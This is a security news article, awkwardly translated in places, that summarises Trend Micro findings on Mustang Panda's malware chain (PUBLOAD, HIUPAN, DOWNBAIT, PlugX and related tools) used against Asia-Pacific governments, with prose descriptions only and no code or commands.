The threat actor is tracked as Mustang Panda refined its malware arsenal to include new tools to facilitate data theft and deployment of next-stage payloads, according to new findings from Trend Micro.
A cyber security firm that tracks a cluster of activity called Earth Preta said it observed “the distribution of PUBLOAD via a variant of the HIUPAN worm.”
PUBLOAD is a known bootloader malware associated with Mustang Panda since early 2022, deployed as part of cyberattacks targeting government organizations in the Asia Pacific (APAC) region to deliver PlugX malware.
“PUBLOAD was also used to inject additional tools into the target environment, such as FDMTP, which served as a secondary management tool that was observed to perform tasks similar to PUBLOAD; and PTSOCKET, a tool used as an alternative to exfiltration,” said security researchers Lennart Bermejo, Sunny Lu and Ted Lee.
Using Mustang Panda removable drives as a distribution vector for HIUPAN was previously documented by Trend Micro in March 2023. This is tracked by Mandiant, a Google-owned company FOG CLOAKwhich he observed in connection with a cyberespionage campaign targeting the Philippines that could begin as early as September 2021.
PUBLOAD is equipped with functions to perform reconnaissance of an infected network and collect interesting files (.doc, .docx, .xls, .xlsx, .pdf, .ppt and .pptx), while serving as a conduit for a new hacking tool called FDMTP, which is ” a simple malware downloader” implemented based on the TouchSocket protocol over Duplex Message Transfer Protocol (DMTP).
The resulting information is compressed into a RAR archive and transmitted to an attacker-controlled FTP site via cURL. Alternatively, Mustang Panda has also been seen deploying a special program called PTSOCKET that can transfer files in multi-threaded mode.
Additionally, Trend Micro attributes the adversary to a “fast-evolving” phishing campaign that it discovered in June 2024 distributing emails with a .url attachment that, when launched, is used to deliver a signed downloader called DOWNBAIT.
The campaign is believed to have targeted Myanmar, the Philippines, Vietnam, Singapore, Cambodia and Taiwan, based on the file names and contents of the decoy documents.
DOWNBAIT is a first-stage bootloader tool used to obtain and execute the PULLBAIT shellcode in memory, which then downloads and runs a first-stage backdoor called CBROVER.
The implant, for its part, supports file upload and remote shell execution capabilities, and acts as a delivery vehicle for the PlugX Remote Access Trojan (RAT). PlugX then takes care of deploying another file collector called FILESAC that can collect the victim’s files.
The disclosure comes as Palo Alto Networks Unit 42 in detail Mustang Panda’s abuse of the reverse shell functionality built into Visual Studio Code to gain a foothold in targeted networks, indicating that the threat actor is actively changing its modus operandi.
“Earth Preta has demonstrated significant progress in its malware deployment and strategies, particularly in its campaigns targeting government organizations,” the researchers said. “The group developed their tactics by (…) using multi-stage bootloaders (from DOWNBAIT to PlugX) and possibly using Microsoft cloud services to steal data.”
